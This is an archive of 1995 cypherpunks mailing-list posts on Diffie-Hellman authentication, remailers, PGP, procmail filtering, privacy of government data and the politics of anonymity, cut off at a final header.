Message-ID: <Pine.SUN.3.91.950130141846.6455B-100000@zydeco.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Jan 1995, Matt Blaze wrote:

> And if you had a trusted secure key
> store on the remote host, you wouldn't really need to use Diffie-Hellman
> to establish the session key in the first place, since you could just
> store each user's pre-established session key in advance.

Right - using DH exchange is probably appropriate in situations where
there is no pre-established credentials for the party on the other
machine.  Inter-domain authentication while possible in theory is not
often carried out to any great extent in reality.  Companies don't trust
each other, or at least are not concerned by this lack of security for
inter-domain communications. 

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Mon, 30 Jan 95 15:09:49 PST
To: cypherpunks@toad.com
Subject: RE: "bad" government
Message-ID: <199501302310.PAA13622@mail.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


> Subject:       RE: "bad" government
> Cc:            cypherpunks@toad.com

> From: Richard K. Moore
> 
> >This has always been the case throughout history - the forces of dark, of
>> disinformation, have always attempted to keep true power from the hands of
>> the people.
> 
>> So why are you on the wrong side?
> .............................................................
> 
> So considering the political consequences from the use of cryptography, 
> as continuously elaborated upon here, what are you doing on this list  
> -  learning how to achieve a libertarian ideal?
> 
>     ..
> Blanc
> 

Do you assume privacy and protection from arbitrary power are solely 
libertarian concerns?  If so, educate yourself and check out the ACLU 
and Amnesty International ...

I even know lots of cyrpto-anarcho-libbers [or whatever Tim May is 
calling them nowadays ;-] who are willing to concede, under pressure, 
that unfettered corporations can be as dangerous to freedom as any 
government.

So encrypt away, guys, and I'll keep telling *my* compatriots that no, 
"the modem in Washington" didn't rig all the vote-counting computers 
in the last election.  I'm relying on you-all to keep it that way, 
while others try to make/keep voting meaningful.  It's called 
division of labor ...
Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Turner <turner@telecheck.com>
Date: Mon, 30 Jan 95 13:00:19 PST
To: cypherpunks@toad.com
Subject: Where is the Line Between Public and Private Data?
Message-ID: <9501302100.AA05636@TeleCheck.com>
MIME-Version: 1.0
Content-Type: text


I found an interesting article in Beyond Computing.  The atricle,
entitled "Where Is the Line Between Public and Private Data?" written
by Dr. H. Jefferson Smith, may be of some interest to those on the list.

The article basically hashes over the Government's trend in selling data
about its citizens to companies.  While I knew various state agencies
sold driver's license data to credit card companies, I had no idea about
the depth of what is going on.

The U.S. Postal Service is selling the NCOA (National Change of Address)
data to credit card companies.  Some junk-mailing lists are also 
produced.

Drivers license data is used by marketing companies, to target specific
sections of the public (ie, people who wear glasses, short people,
etc.).

--Begin Exerpt--
"Here's another example.  In 1992, it was reported that voter records in
a certain county were for sale on a CD-ROM disk (1.25 million voter
records were priced at $99).  The disk contained names, addresses,
phone numbers (in some cases, unlisted numberse), occupations, political
affiliations, birthplaces and birth dates.  Another company sold a CD
database that contained information from deed filings: the owner's name
and address, when the property was purchased, the number of bathrooms
and bedrooms in the house, the square footage and property assessments."
--End exerpt

What suprises me is that if had the first CD-ROM, it would be very
easy for me to apply for credit cards in other peoples names... I
shudder to think...

The article goes on to further explain the government's lusts over
private databases and "'The only reason you should fear the use of such
records is if you have something to hide' is an often-heard argument."

 
-- 
Joe N. Turner		Telecheck International
turner@telecheck.com    5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659
compu$erv: 73301,1654	(800) 888-4922  *   (713) 439-6597
Finger for PGP KEY.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nobody@eniac.ac.siue.edu (Anonymous)
Date: Mon, 30 Jan 95 14:05:21 PST
To: cypherpunks@toad.com
Subject: Charon remailer
Message-ID: <199501302157.PAA12043@eniac.ac.siue.edu>
MIME-Version: 1.0
Content-Type: text/plain


A new cypherpunk remailer is up on charon@styx.jpunix.com. Attached is the
key.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAy8r7kYAAAEEAO962HnaZ6QjZviF0Dv2qEOsFlVd8ifKwgmMhCZTye6WQ+xx
uV+8ojd6L0lAn2VCFhqJLUYDMPfg98dljeLmVZf0eq4eLHp9CdZjx4gbHuLE5/qL
Bjw5H4/WaHNYEeIlgBpwXmVtBXusBm6IsygB+IwHErdonCBBdxhDRM3gi8mFAAUR
tChDaGFyb24gUmVtYWlsZXIgPGNoYXJvbkBzdHl4LmpwdW5peC5jb20+iQCVAwUQ
LyvvCxhDRM3gi8mFAQGTZgQA3CXxXCPDsHmN+o+JtElH/j1kwEDW9FLCETnqn3oJ
jGj5vvcTA6PAg4iVcCObIcK+f2oJ10yvz+JYO9VP+TyFhy3rclHQxyQnzv5G4iyh
e+i1qpzAIzzuH4ZbCx1Em4DoT3LZPByhmG6MINOfSj7cHoXHo+vmWVsKGGARJS5W
q7I=
=hMFF
-----END PGP PUBLIC KEY BLOCK-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Mon, 30 Jan 95 13:05:57 PST
To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <Pine.SUN.3.91.950130141846.6455B-100000@zydeco.src.umd.edu>
Message-ID: <9501302104.AA24274@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Thomas Grant Edwards says:
> Right - using DH exchange is probably appropriate in situations where
> there is no pre-established credentials for the party on the other
> machine.

D-H also provides perfect forward secrecy, which is a reason to use it
even if there is already an established set of credentials.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Mon, 30 Jan 95 15:46:20 PST
To: cypherpunks@toad.com
Subject: Re: hacker search
In-Reply-To: <9501271329.AA26776@anon.penet.fi>
Message-ID: <Pine.SUN.3.91.950130162021.23037B-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Jan 1995, beacher wrote:

> Cunningham said Mitnick is a ham radio enthusiast and is believed to use a
> scanner to keep track of police in the area where he is hiding.

I do hope that he was called an Amateur ("ham") because he really is
one (and what is the relevance?), and not because he happened to have
a scanner...

There's been lots of media reports equating scanner-listeners with
Amateur radio enthusiasts (and the media wonder why they are despised).

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Mon, 30 Jan 95 13:32:13 PST
To: Blanc Weber <blancw@microsoft.com>
Subject: Re: "bad" government
In-Reply-To: <9501301933.AA27413@netmail2.microsoft.com>
Message-ID: <9501302131.AA01163@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    From: Blanc Weber <blancw@microsoft.com>
    Date: Mon, 30 Jan 95 11:22:38 PST
	
    So considering the political consequences from the use of cryptography, 
    as continuously elaborated upon here, what are you doing on this list  
    -  learning how to achieve a libertarian ideal?

As is often stated here, people with very widely varying political
views are interested enough in cryptography to seek out the handful of
message on this list which address that subject :-)

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Mon, 30 Jan 95 17:41:22 PST
To: cypherpunks@toad.com
Subject: RE: "bad" government
Message-ID: <9501310141.AA29419@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Richard F. Dutcher"

Do you assume privacy and protection from arbitrary power are solely
libertarian concerns?  If so, educate yourself and check out the ACLU
and Amnesty International ...
..................................................

You can check out each group, each organization, each institution, etc. 
one by one, and eventually arrive at the realization that it's a matter 
of principle.    Anyone can make your life hell, even the "good guys" 
who are supposed to know better and whose talents are engaged 
supposedly for the support of great ideals.

"Oh Liberty, what crimes have been committed in your name."

    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 30 Jan 95 18:28:17 PST
To: cypherpunks@toad.com
Subject: Re: ESP Unix encrypted session protocol software
Message-ID: <9501310159.AA00485@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> How to do authentication of DH sessions  - it's hard to store
> a private-key safely on a multi-user server.

For now, let's look at this as client-server, rather than peer-peer.
One direction of authentication isn't too hard - the remote
client can authenticate his half with a PGP (or equivalent) public key,
and the server can keep a cache of known clients' public keys,
plus maybe have a good connection to a key server, and use web-of-trust
to help fill in the gaps.  (Getting all the details right is annoying...)
(And it increases the protocol a lot, involves post-1997 patent control,
and invokes PGP-vs.-RIPEM Public-Key-Implemention political wars.
But it's all an exercise for the reader :-)

One way to resolve the server direction is to hand-wave it away -
the authentication problem you need to solve is the man-in-the-middle;
man-at-the-end is a different problem.  After all, if the Bad Guys can 
break into the server well enough to steal root's private key,
the server is hosed anyway, and untrustable.  (The variant where the
server process is user-owned rather than root is really no different.)

If there _is_ another way to solve the server direction, it's to
do something like input the server's private key or the secret key
for root's private-key keyring into the process form a terminal
rather than a file, so it isn't stored on disk anywhere;
not a big win, but it's something.

An alternative to server authentication is to use a well-known published
half-key for the server end.  (Obviously the server still needs to keep
x private while publishing g**x mod m, but that's hard anyway.)
The client doesn't have to authenticate it, since it's well-known,
though it could be signed with a key not stored on the server,
and the server can authenticate the client's signed half-key,
so the man-in-the-middle is still unable to fake the session.
People have discussed how much this reduces security; I don't remember
the conclusions.

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Mon, 30 Jan 95 15:07:50 PST
To: Cypherpeople <cypherpunks@toad.com>
Subject: Better living through `procmail'
Message-ID: <Pine.SUN.3.91.950130180105.27139A-100000@unix2.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain



-- excerpt from /home/grendel/.procmailrc --
:2:
(^From owner-cypherpunks@toad.com|^Sender: owner-cypherpunks@toad.com)
^Subject:.*alt.religion.your.operating.system.sucks
/dev/null

:3:
(^From owner-cypherpunks@toad.com|^Sender: owner-cypherpunks@toad.com)
^From:.*perry@imsi.com
^In-Reply-To:.*netcom.com
/dev/null

:3:
(^From owner-cypherpunks@toad.com|^Sender: owner-cypherpunks@toad.com)
^From:.*jamesd@netcom.com
^In-Reply-To:.*imsi.com
/dev/null

:1:
(^From owner-cypherpunks@toad.com|^Sender: owner-cypherpunks@toad.com)
$LISTDIR/cypherpunks
-- end excerpt --

Apply and modify as necessary. The "kill Perry's replies to James" 
recipe is a bit lossy, (i.e. it will kill anything that Perry replies 
to from Netcom on the cpunks list) but we can't have everything can 
we? 

Cheers!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkmoore@iol.ie (Richard K. Moore)
Date: Mon, 30 Jan 95 10:39:24 PST
To: cypherpunks@toad.com
Subject: "bad" government
Message-ID: <199501301838.SAA20864@GPO.iol.ie>
MIME-Version: 1.0
Content-Type: text/plain



>From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])

>Governments as a whole are seen to be "bad" because they invariably undermine
the right of the individual to make choices for themselves.

Quite untrue. It's society which provides you with an environment in which
you have choices. And its government which orders that society. It's
because government has served you so well, that you have luxury to
fantasize you don't need it. You're being duped.

---

>The so-called "Third Wave" has nothing to do with government and everything to
do with the empowerment of the individual.  Some seem to not recognize that.

The "Third Wave" -- if you take the PFF's Magna Carta definition (and
Toffler is one of the authors) -- is a power grab by corporations to return
the world economy to status of the USA economy in the 1880's. You so-called
libertarians might like the theoretical, abstract formula of "unregulated
capital", but if you'd put down your Friedman long enough to read history,
you'd know that it was a disaster. Unregulated capitalism is incompatible
with a civilized societiy.

---

>This has always been the case throughout history - the forces of dark, of
disinformation, have always attempted to keep true power from the hands of
the people.

So why are you on the wrong side?


-rkm

PS> If this list would like to see the full Magna Carta, or my
analysis/review of it ("Electric Dreams" sent you a few clips), please let
me know.



---

Richard K. Moore - rkmoore@iol.ie - Wexford, Ireland - fax +353 53 23970






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Mon, 30 Jan 95 15:38:48 PST
To: grendel@netaxs.com (Michael Handler)
Subject: Better living through better `procmail'
In-Reply-To: <Pine.SUN.3.91.950130180105.27139A-100000@unix2.netaxs.com>
Message-ID: <199501302338.SAA08570@bwnmr5.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


	The rule below involve no loss, and it works quicker
by putting the whole cypherpunks thing inside a set of braces,
rather than checking each message 6 times to see if its from the
cypherpunks list.

	Optimizing a bit more, You don't need a lockfiles on
/dev/null, unless you want to make sure the messages go in as whole
units.  Also, theres no reason to send the whole message, we save time
by only sending the header to /dev/null.  Procmail just frees the
body.

	
:0
* (^From owner-cypherpunks@toad.com|^Sender: owner-cypherpunks@toad.com)
{
  :0 h
  * ^From:.*perry@imsi.com
  * ^(To|cc): jamesd@netcom.com
  /dev/null
...
}

| Apply and modify as necessary. The "kill Perry's replies to James" 
| recipe is a bit lossy, (i.e. it will kill anything that Perry replies 
| to from Netcom on the cpunks list) but we can't have everything can 
| we? 

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Barrett <barrett@daisy.ee.und.ac.za>
Date: Mon, 30 Jan 95 09:06:17 PST
To: Matt Blaze <mab@research.att.com>
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <9501301554.AA08155@merckx.info.att.com>
Message-ID: <Pine.NEB.3.91.950130184247.21652h@daisy.ee.und.ac.za>
MIME-Version: 1.0
Content-Type: text/plain


> Because of export restrictions (and a large cabal of paranoid, rabid
> lawyers watching my every move), I'm not able to send ESP out of the
> US or Canada or make it available by anonymous ftp.  Sorry.

Can you make the protocol specs available?

--apb (Alan Barrett)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Mon, 30 Jan 95 16:10:52 PST
To: msattler@jungle.com (Michael Sattler)
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <v03001109ab523a0cd3f8@[140.174.229.228]>
Message-ID: <m0rZ1X3-0009t3C@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


Maybe we're just in stego ... :-)

> Perhaps it's just me, but I thought the header that was substituted a few
> days ago was designed to be a subtle hit to the flamers.  Since it seems
> not to have worked, allow me to be a bit more explicit.
> 
> HEY, MORONS!  THIS IS AN ASSEMBLAGE OF PERSONS INTERESTED IN THE
> FURTHERANCE OF CRYPTOGRPAHY.  While it is true that to persons not familiar
> with a particular operating system, it may appear cryptic, this really
> isn't what cryptography is all about.  TAKE IT ELSEWHERE!
> 
> Thank you.  Have a nice day.  Teco rules!

And lives on in Emacs...

sdw
-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant    513-865-9599 FAX/LIG   513.496.5223 OH Page BA Aug94-Feb95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewall/WWW srvrs ICBM/GPS: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W wrk
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.28Jan95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Mon, 30 Jan 95 20:47:36 PST
To: Matt Blaze <tedwards@src.umd.edu>
Subject: Re: ESP Unix encrypted session protocol software
Message-ID: <ab536a4f010210046459@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 10:02 AM 1/30/95, Matt Blaze wrote:
....>As for the alternatives, I think the picture is pretty bleak, to tell
>the truth.  The cryptographically sound way to prevent spoofing is
>with authentication of the agreed key.  But for the remote host to
>authenticate itself, it has to have a secret signature key.  Where to
>store it?  A typical machine, especially a multi-user, unattended server
>simply has no safe place to store keys.
....
There would be on a secure "multi-user, unattended server". They are not
easy to come by and they arn't really Unix. I don't get on my soap box very
often but I couldn't resist your execelent opportunity. I think that
security requires good crypto and good OS security. There are Orange book
rated systems that are rated to run hostile software in the same machine
with Top Secret information.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Feuer <adamfast@seanet.com>
Date: Mon, 30 Jan 95 22:23:10 PST
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: PGP/crypto XCMDs for hypercard...
Message-ID: <Pine.NXT.3.91.950130221702.3459H-100000@kisa>
MIME-Version: 1.0
Content-Type: text/plain



  anyone know if there are any PGP or general crypto XCMDs for hypercard? 
i'm prototyping a front-end to control some premail stuff and some secure 
WWW server apps, and it would be convenient to have something like this. 
  on related notes, anybody know about XCMDs that talk to MacTCP...? and 
can someone send me status or a pointer to the PGP library for windows?

  please reply to me personally; i'll summarize to the list.

-adam

Adam Feuer
adamfast@seanet.com
206-628-8813






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Mon, 30 Jan 95 23:50:22 PST
To: cypherpunks@toad.com
Subject: RE: "bad" government
Message-ID: <199501310751.XAA12750@mail.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain



>> Subject:       RE: "bad" government

>> From: "Richard F. Dutcher"
> 
>> Do you assume privacy and protection from arbitrary power are solely
>> libertarian concerns?  If so, educate yourself and check out the ACLU
>> and Amnesty International ...
> ..................................................
> 
> You can check out each group, each organization, each institution, etc. 
> one by one, and eventually arrive at the realization that it's a matter 
> of principle.    Anyone can make your life hell, even the "good guys" 
> who are supposed to know better and whose talents are engaged 
> supposedly for the support of great ideals.
> 
> "Oh Liberty, what crimes have been committed in your name."
> 
>     ..
> Blanc
> 

All too true.  What's your point?  Got a principle that *hasn't* been 
used/abused?

 
Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: avi baumstein <avi@clas.ufl.edu>
Date: Mon, 30 Jan 95 20:22:41 PST
To: mossberg@wsj.com
Subject: No Subject
Message-ID: <199501310422.XAA28500@cutter.clas.ufl.edu>
MIME-Version: 1.0
Content-Type: text/plain


sandrew@ufl.edu, dart@freenet.ufl.edu
Subject: WSJ column of 1-26-95


The following refers to the page B1 article in the January 26, 1995
column of The Wall Street Journal titled "Personal Technology" by
Walter S. Mossberg.

-----BEGIN PGP SIGNED MESSAGE-----

Mr. Mossberg:

Your editorial warning of the dangers of the online universe, while
well written, presents many arguments which do not make sense in
the current context of society or the Internet.

Your belief that anonymity is ruinous to on-line culture is based on
simply incorrect assumptions. The most egregrious of these is that
anonymity is anti-democratic and not present in our non-digital
society. It is widely known that the Federalist Papers were published
under psuedonyms, as have many other works which our culture holds
dear (Samuel Clemmons' Mark Twain identity comes to mind). Anonymity
can be acheived in the written word very easily today, by simply not
signing a letter, and dropping it in the nearest mail box. The White
House is one of the biggest receipients of such anonymous mail.
Newspapers routinely publish anonymous articles, often credited to "AP
Newswire". Most editorials bear no author (although the editorial
board can be identified, who is to say which one of them, or even if
any of them wrote a specific piece?) It is not uncommon for letters to
the editor to be published unsigned, to protect the wishes of the
author. 

The corporation is a form of anonymity. The legal term used to
describe a corporation's name screams of anonymity: Fictitious Name.
Oil companies routinely print ads in major media under names such as
"Coalition to clean our beaches". These are not only anonymous, but
misleading. 
 
Yet given all these methods of anonymous publishing (in print,
none-the-less), our society has existed in it's present form for
several centuries. And I am sure that anonymity is by no means a
product of modern day America.

Your statement "Our democracy and society require accountability, not
anonymity." is 100 percent wrong. When you go into a voting booth, do
you sign your ballot? Our government is founded on anonymity, and
SHARED accountability. We are all responsible for what happens in this
country. Perfect accountability is actually acheived only in a
dictatorship, where it is known that only the dictator is calling the
shots. That's certainly not democracy. 

Anonymity has many positive uses. The most often mentioned is for
victims to be able to discuss their problem without fear of
retribution or identification. There are many places on the Internet
where such discussions regularly take place. Another use can be where a
person wants their opinions to be judged on their merit, rather than
their name (have a look at The Economist, which does not publish
bylines, but yet it is extremely respected. Possibly there is some
connection here). Other uses can be whistleblowers; The state of
Florida maintains an anonymous hotline for government workers to tip
off the Comptroller about wastes and abuses. 

The bottom line is that anonymity, rather than being a bane to
democracy and freedom, is actually essential to the proper workings of
our society.

As a last example, I draw your attention to the lines that delineate
this email message. They proclaim that this document has been "PGP
signed". This is a technology that allows you (or anyone else) to
verify with almost certainty that it was I who wrote this letter. This
is a counterpart to anonymity in the on-line universe. Were I the
president, sending an official document, rather than believing the
name I signed or whomever my on-line service claimed to be, you could
independantly verify that that signature belonged to me, and that it
was indeed I who produced the contents of the message. 

There is no problem with anonymity OR accountability today, both work
perfectly fine, and serve their respective purposes.

Sincerely, 

- -avi

Avi Baumstein
avi@clas.ufl.edu


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLy25T/sIKWn2XtaVAQG5WgH/eNa8RZw4pfjccZJjZU3u2Y6aeulJa3T8
dDgkHr1vZxdCe7pii7CKpa+UKg6irpqwr6RUhYqCsq/svufmtdNkdw==
=kENj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: avi baumstein <avi@clas.ufl.edu>
Date: Mon, 30 Jan 95 20:25:15 PST
To: sandrew@ufl.edu
Subject: WSJ editorial on anonymity
Message-ID: <199501310425.XAA28642@cutter.clas.ufl.edu>
MIME-Version: 1.0
Content-Type: text/plain



The article from the January 26, 1995 Wall Street Journal titled
"Personal Technology" and dealing with the horrors of anonymity can be
found at:

	<http://www.clas.ufl.edu/~avi/NII/wsj_no-anon.html>

my response and other information regarding the NII can be found at:

	<http://www.clas.ufl.edu/~avi/NII>
-avi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Mon, 30 Jan 95 23:07:28 PST
To: cypherpunks@toad.com
Subject: Is the remailer crisis over?
Message-ID: <CeSBlKjqRGfK078yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Well folks as of 11:30 on 1-30-94 there are 14 remailers with uptimes
greater than 99%. What's the consensus...Is the remailer crisis over?

Sam

--
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
           And God said: E = *mv* - Ze*/r ...and there *WAS* light!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@netcom.com
Date: Tue, 31 Jan 95 00:43:09 PST
To: Chris.Claborne@SanDiegoCA.ATTGIS.COM
Subject: The RSA FAQ on http://www.catalog.com/jamesd/rsafaq.html
Message-ID: <199501310841.AAA25011@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Chris converted the RSA FAQ to html for easy reading.

I have placed this faq on http://www.catalog.com/jamesd/rsafaq.html

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Mon, 30 Jan 95 21:48:38 PST
To: norm@netcom.com (Norman Hardy)
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <ab536a4f010210046459@DialupEudora>
Message-ID: <9501310546.AA09683@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain



>At 10:02 AM 1/30/95, Matt Blaze wrote:
>....>As for the alternatives, I think the picture is pretty bleak, to tell
>>the truth.  The cryptographically sound way to prevent spoofing is
>>with authentication of the agreed key.  But for the remote host to
>>authenticate itself, it has to have a secret signature key.  Where to
>>store it?  A typical machine, especially a multi-user, unattended server
>>simply has no safe place to store keys.
>....
>There would be on a secure "multi-user, unattended server". They are not
>easy to come by and they arn't really Unix. I don't get on my soap box very
>often but I couldn't resist your execelent opportunity. I think that
>security requires good crypto and good OS security. There are Orange book
>rated systems that are rated to run hostile software in the same machine
>with Top Secret information.
>
>

Sure, but as you point out in your second sentence, systems that are
secure enough for secret storage aren't exactly "typical" of what's out
there on the Internet.  And even an Orange book A rated system has to
be kept locked up, under guard and administered properly if you want to
be sure that the secret data stored on it remain secret.

The vast majority of unattended "server" machines in my online life are
neither located in well-controlled environments (especially considering
backup tapes) nor administered particularly well.  I'm not sure that
persistent signature keys stored on such hosts provide much extra
assurance of machine identity beyond what already comes from their
answering to the expected IP address (which is hardly saying much, of
course).  I think better than expecting the world to switch over to
cumbersome, multilevel secure OSs is to equip such servers with
inexpensive tamper-resistant cryptographic modules that never reveal
their secrets.  At least then you're guaranteed that there can be only
one instance of a machine's identity out there at a time, and have some
hope of detecting the theft of the key material.  (There may be some
hope on this front.  PCMCIA crypto modules like the NS iPower card are
beginning to hit the market already, and products like that may well be
commonplace by the time host authentication protocols start to be
deployed for real on the Internet.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@rebma.rebma.mn.org
Date: Tue, 31 Jan 95 01:56:20 PST
To: cypherpunks@toad.com
Subject: nullWhat's Killing My Remailed Posts?
Message-ID: <199501311018.EAA01333@rebma.rebma.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


[Please  Reply-To: an105@vox.xs4all.nl  as I am not receiving the group
or list on which this message _hopefully_ appears.  Thanks!]

Though I have been vigorously using the various remailers for a long
time, I am stumped by my sudden inability to get a post to a newsgroup
by any remailed means.  Example:  For a long time I have used the
following boilerplate form with usura@replay.com with flawless results:

::
Encrypted: PGP

::
Anon-To: my.anon.address@somewhere.org
Cutmarks: *

| Message Successfully Remailed, # 999

*
::
Anon-To: mail2news@demon.co.uk
Cutmarks: ___
Latent-Time: +6:00r

##
Newsgroups: alt.some.group,misc.another.group
Subject: Furballs in Wolverines

My wolverine has nasty furballs...
[...]
My wolverine thanks you all for suggestions...
___


The current status of this is that I get the remailed receipt, but the
message never shows in the group.  Is mail2news@demon.co.uk down?

I tried using the Usura Anon-Post-To: feature, but it fails as well.

I've tried using _other_ remailers with the simple form...

        Anon-To: alt.some.group@comlab.ox.ac.uk
        Anon-To: alt.some.group.usenet@decwrl.dec.com
        Anon-To: alt.some.group@bull.com

I've also tried Request-Remailing-To: with the same address form.  Nada.

I have been unable to make any of the usual remailers get through to the
groups by any means for about three weeks, though evidence shows that
the remailers are certainly getting the messages, as I can send anon
netmail messages - - - the _posts_ just never show.

I periodically suspect that someone somewhere is running a program to
sweep all posts with "remail," "nobody" or "anon" anywhere in the
header. 

Any thoughts on this...assuming it shows here?



___ Blue Wave/QWK v2.12




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nobody@eniac.ac.siue.edu (Anonymous)
Date: Tue, 31 Jan 95 02:52:50 PST
To: cypherpunks@toad.com
Subject: Re: Is the remailer crisis over?
Message-ID: <199501311044.EAA12304@eniac.ac.siue.edu>
MIME-Version: 1.0
Content-Type: text/plain


Samuel Kaplin <skaplin@mirage.skypoint.com> wrote:

> Well folks as of 11:30 on 1-30-94 there are 14 remailers with uptimes
> greater than 99%. What's the consensus...Is the remailer crisis over?

It'll be over when they are equally distributed across countries, not
90+% in the USA as is currently the case.  However, 14 is a good start
and perhaps the Rest Of The World will catch up.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Beattie <beattie@PEAK.ORG>
Date: Tue, 31 Jan 95 07:50:45 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <Pine.3.89.9501301030.A25404-0100000@netcom10>
Message-ID: <Pine.3.88.9501310716.A5290-0100000@PEAK.ORG>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Jan 1995, James A. Donald wrote:

> 
> Perry,  I listed a huge number of the things that anonymous
> is complaining about, under the thread heading "Even more 
> holy war on unix"
> 
> I listed them precisely in response to flames like yours
> challenging me to name such things.
> 
> If you ask "Such as" then someone is going to answer again.
> 
> The Holy Warriors of the Sacred Unix demand facts, then
> scream like nasty children when someone answers this demand.

Did I miss something?  Was there a posting of facts amoungst
those volumes inimformed opinions?

> 
> They say "Put up or shut up", and then send a torrent of 
> savage hate mail when somebody puts up.

Yes it so sad when people hold opions that differ from your's

> 
> 
> 
>  ---------------------------------------------------------------------
>                                           |  
> We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
> and our property, because of the kind     |  
> of animals that we are. True law          |   James A. Donald
> derives from this right, not from the     |  
> arbitrary power of the omnipotent state.  |   jamesd@netcom.com
> 
> 

Brian Beattie         | [From an MIT job ad] "Applicants must also have
                      | extensive knowledge of UNIX, although they should
beattie@csos.orst.edu | have sufficently good programming taste to not
Fax (503)754-3406     | consider this an achievement."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hkhenson@cup.portal.com
